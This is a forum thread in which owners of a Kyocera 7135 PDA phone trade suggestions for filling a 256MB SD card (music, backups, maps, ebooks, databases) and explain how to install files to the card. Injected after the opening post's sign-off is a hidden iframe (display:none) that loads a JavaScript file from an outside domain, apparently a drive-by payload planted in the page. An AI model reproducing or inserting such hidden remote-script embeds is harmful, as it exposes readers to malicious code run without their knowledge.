+ Reply to Thread
    oas

What to do with all of my memory?

Just bought a 256M SD card for my 7135. Just wondering what kind of stuff people store on the card. Photos, movies, and maps are the obvious ones that come to mind. What else can you suggest?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: What to do with all of my memory?

Originally posted by oas
    Just bought a 256M SD card for my 7135. Just wondering what kind of stuff people store on the card. Photos, movies, and maps are the obvious ones that come to mind. What else can you suggest?

Thanks.
    System backup (using Backup Buddy VFS)
    Dave

Originally posted by oas

Thanks.
    I have about 200 megs(4 hours of music), 20 megs in videos to show off the phone, (two trailers for Kinoma, and two I encoded for TealMovie)
    I have the 32Mb expansion card that comes with BackupBuddyVFS for my backing up.
    I had some database programs for mixed drinks that I'll end up installing on the card.

I considering moving some of my games to the card as well. One tip don't move any conduit programs(like Advant Go)

Originally posted by oas

Thanks.
    MP3's??

Yeah, sure, why not.
    ~'kito
    pdaPhoneHome Moderator

I'm using 86.6 MB of my 256MB (241.1 MB) card.

MP3 music and audiobook files
    RAM Backup (BBVFS)
    Bibles
    Palmreader Books, Docs, PDF files
    Maps
    Databases (JFILE)
    Quickoffice documents
    Games
    Acrobat Reader (does have a conduit but works fine)

Almost every program that has no conduit works just fine from the card and I have a lot of programs.

If I'm going to use my SD card for storing JPGs, MP3s and Office files, how do I get them on there? There is a MP3 downloader on the phone, but where does it put the MP3s? What about QuickOffice files? How do I set it up so that they go directly to the card and not the internal memory? I hope all of this makes sense. I just want to make sure that I don't use up all my internal memory as I did with the 6035. What is the best procedure for insuring that certain files go to the SD card and not the internal memory? ALso, what would you reccomend that I keep on the card besides JPG, MP3s & QuickOffice files?

Thanks,
    Chris Mattix
    Personal Real Estate Consultant

MattixC, to get files onto the card you have to press the "Change destination" in the 7135 Install tool. It will let you choose the SD card there for the files you choose.

I also plan to store Videos, E-books, Audio-books, GPS Maps and probably a Dictionary and Encycopedia if I find good versions, and after that anything else that will fit!
    iPhone therefore iAm.

Thanks. Do I do this also for downloading QuickOffice files?

Thanks,
    Chris Mattix
    Personal Real Estate Consultant

Originally posted by Steve

I also plan to store Videos, E-books, Audio-books, GPS Maps and probably a Dictionary and Encycopedia if I find good versions, and after that anything else that will fit!
    How about COLOR GAMES? Can you store color games on those cards??

Originally posted by mattixc
    There is a MP3 downloader on the phone, but where does it put the MP3s?
    /AUDIO
    What about QuickOffice files? How do I set it up so that they go directly to the card and not the internal memory?
    You can copy them using cruzer or from the application to /PALM/Programs/Quickoffice. I don't know how to do that using a normal hotsync.

ALso, what would you reccomend that I keep on the card besides JPG, MP3s & QuickOffice files?
    Get PowerRun and use it to move apps where you will want the entire program and all associated files moved to RAM each time you run it. I run Quickpoint w/PowerRun since I rarely use it and never keep presentations in RAM. Use Filemanager and you'll get a better understanding of what files are associated with apps and what is going on the card.

Thanks. Do I do this also for downloading QuickOffice files?

Thanks,
    I haven't messed enough with QuickOffice yet to figure it all out but I think you are supposed to be able to.

The first thing I noticed is that Quickoffice also installed a Quick Desktop app that let's you "Link" files to sycronize. Again I haven't tried it but you should be able to sync files and read stand-alone quickoffice files.
    iPhone therefore iAm.